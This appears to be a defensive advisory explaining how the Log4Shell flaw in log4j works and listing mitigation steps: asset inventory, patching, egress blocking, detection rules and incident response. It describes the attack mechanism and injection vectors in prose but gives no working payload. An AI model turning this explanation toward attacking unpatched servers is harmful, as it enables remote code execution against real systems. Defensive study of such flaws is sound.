How does Log4Shell work?

But first it is important to understand the issue. It works like this: if an attacker can get a specific attack string logged through log4j, this string will trigger log4j to make a connection to an attacker-controlled host, and download a piece of attacker-provided code and execute that. So what kinds of things are logged? Quite a lot, it turns out! Could be a username, an email header, a website cookie, really anything could get logged somewhere along the way. And to complicate things, sometimes things are logged at a later date, or only after a certain number of events have occurred. For instance, some logging mechanism might only log a failed login attempt after 10 or more attempts. So it is difficult to test all possible injection vectors and it is entirely possible that all your externally internet-exposed servers are not vulnerable, but a backend internal application server is. The point is, an attacker can spray the strings around and hope it will find vulnerable components at some time. At the time of this writing, vulnerable products include many mainstream solutions: Jira, Confluence, Splunk, Elastic, VMWare vCenter and many many more. Some are actually security products!

Luckily the Dutch NCSC is tracking known vulnerable software. They are also providing IOCs and mitigations. So instead of providing these here, we will redirect everyone to their repository.

Steps To Take

  1. Figure out where you are using log4j or a vulnerable product that uses log4j. Check the list at https://github.com/NCSC-NL/log4shell regularly because it is updated continuously!
  2. Patch your software, or apply one of the mitigations mentioned in the link to the NCSC GitHub repo. Don’t forget: it’s not just internet-facing systems that can be attacked.
  3. If you can’t patch or mitigate, make sure that a vulnerable server cannot make an internet connection as a temporary solution.
  4. Configure your IDS and SIEM to block the IOCs and implement detection rules, again we refer to https://github.com/NCSC-NL/log4shell for this information (and keep it up to date because there are also many ways to bypass the detection rules).
  5. If you have indications of compromise of a server, take standard incident response and forensic measures: isolate, contain and investigate.

Asset Management

It is clear that most organization are at risk currently since the exploit is so easy and the vulnerability so widespread. Knowing what you have (asset management) is extremely important and knowing what software components you use (SBOM, see https://www.ncsc.nl/onderzoek/onderzoeksresultaten/software-bill-of-materials-sbom-en-cyber-security-map).

Top